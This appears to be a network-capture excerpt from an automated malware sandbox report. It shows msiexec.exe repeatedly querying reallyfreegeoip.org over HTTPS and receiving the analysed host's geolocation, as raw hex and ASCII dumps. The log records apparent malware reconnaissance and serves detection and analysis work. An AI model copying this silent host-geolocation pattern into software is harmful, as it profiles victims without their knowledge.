                                                                                                                          2024-10-22 14:12:07 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.650000188.114.97.34433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:08 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:08 UTC900INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:08 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31684
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LeY90wv5PG2zWCmcD8xXJUAeyipfSkruj%2F%2FX%2FjKUOcdnfuevMnTXEAST1pS%2FAP7WAnjKwKo1LH8vMjR3BRPfP2pwwrFC8Sl5BhL7yeZLMJWiTg6sWG91YDB1KvU%2Fc%2B0bLvubZio"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14a0291e6b2c-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1080&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2560565&cwnd=251&unsent_bytes=0&cid=b4b3cf7e99c729e3&ts=160&x=0"
                                                                                                                          2024-10-22 14:12:08 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.650001188.114.97.34434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:08 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:08 UTC896INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:08 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31684
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KYbAk3rkrhC9zVdWo34o%2B9Uz24wnUvx8OOP1cJBTePt7lZxykBm7u4AeVrQX%2BHCJQVPU8%2FJB2KFcIBMqV9bA43GKgEgBVGgOK3NjFLMGMkNJAH%2BPRc6tijqJMoTafMwdOwuB2C9L"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14a30ed3c86f-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2029432&cwnd=252&unsent_bytes=0&cid=021c85d77c637da0&ts=218&x=0"
                                                                                                                          2024-10-22 14:12:08 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.650004188.114.97.34433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:09 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:10 UTC898INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:10 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31686
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2FkzDuZyZ%2F84ezCoV8UG7mgxqyW5SxYeG3Z8FtD5M9%2BV51sQaz%2F2dlfIX95CQNOBTTRparEIpW267bg6thHcDPQg2Y5jZTl6Dcv88tuNEXPG9JrKiBS55cAxroCK%2FaePz7rXnA0r"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14aacad34773-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1833&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1490478&cwnd=245&unsent_bytes=0&cid=f00fe05d0293e5a5&ts=153&x=0"
                                                                                                                          2024-10-22 14:12:10 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.650005188.114.97.34434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:10 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:10 UTC893INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:10 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31686
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x9pt9JppU49CRJ5axL%2FuhAZPEvGnHxwnL5GVNvUO%2F2f0EDqGbS1JX6aMbLgST%2FkzWjqMeacT3inXlQwJSoxvcRk2h1ol5KpGM1HqtIvKdUIQz6QerseUHsX1JPjeF4ImuJ6jOC5l"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14ad7da4c871-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1794299&cwnd=97&unsent_bytes=0&cid=4eaddd1d97a0cd97&ts=155&x=0"
                                                                                                                          2024-10-22 14:12:10 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.650008188.114.97.34433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:11 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:11 UTC892INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:11 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31687
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2X7x2PkQQYmUtf1VdX%2BH4VTrf1bFIUQ77ipWDK1YGbx3DDArztNlrhCgdqtZcYHLbmZ9UDzP8r2u2q0V3p4QZQ42ZNhnvCrhDoxSBCXyPCkQcUXDS9oMJIl8UaQybCp2OL%2FMWc9t"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14b4fd1ce9a9-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1381&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2073013&cwnd=251&unsent_bytes=0&cid=23df2b4c614c8d6a&ts=148&x=0"
                                                                                                                          2024-10-22 14:12:11 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.650009188.114.97.34434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:12 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:12 UTC896INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:12 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31688
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hXBjWdAZx%2FhYJjewCQCKrbp7RbulFD%2B0A2lFXuC7xxAv9Nykt7Ttrsn5aQUVsk4qkyAYj2i6aT%2FEMS1NioKFCMYk66nlx9dPrDQOO3ACd7l9ag4429HTPQqDormOupXVBVTow%2Bvk"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14b779796be3-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2450084&cwnd=237&unsent_bytes=0&cid=b53f2f5ed5327d3e&ts=152&x=0"
                                                                                                                          2024-10-22 14:12:12 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.650012188.114.97.34433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:13 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:13 UTC906INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:13 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31689
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0n4Yf8EcWwlp9eioa%2BV%2Fhq639qi25d2x7d8%2FayHDxaI31c6u9Hlb2%2FuTarBb2mtBCUIaw%2Fbnkm4YXRiuOmwb90GmL9WSkzDAu1b7Frh%2F%2BU%2FDknsfXxWBmng9s0Rwx%2BrXfIMxAW2o"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14bf99fa2821-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1398&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2142011&cwnd=249&unsent_bytes=0&cid=a54a5d3e52918753&ts=149&x=0"
                                                                                                                          2024-10-22 14:12:13 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.650013188.114.97.34434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:12:13 UTC87OUTGET /xml/173.254.250.76 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:12:13 UTC893INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:13 GMT
                                                                                                                          Content-Type: application/xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          vary: Accept-Encoding
                                                                                                                          Cache-Control: max-age=86400
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 31689
                                                                                                                          Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SAXdUc1cUmqMudF%2FwM9BHZnRkX%2Bl1jYb0T02W1d5o4FJ6m3BA0%2F8T3nIljMFCnkIuzJuDzWpZoFrPFgzVJ5zTEDsSv5BufxhXAFvD5aR6CIHfMBDjnGcjkEdq2jABTTawTtEqCHN"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6a14c20fa16b55-DFW
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1648&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1740384&cwnd=32&unsent_bytes=0&cid=4250d849815f7e88&ts=161&x=0"
                                                                                                                          2024-10-22 14:12:13 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                                          Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:13 UTC5INData Raw: 30 0d 0a 0d 0a
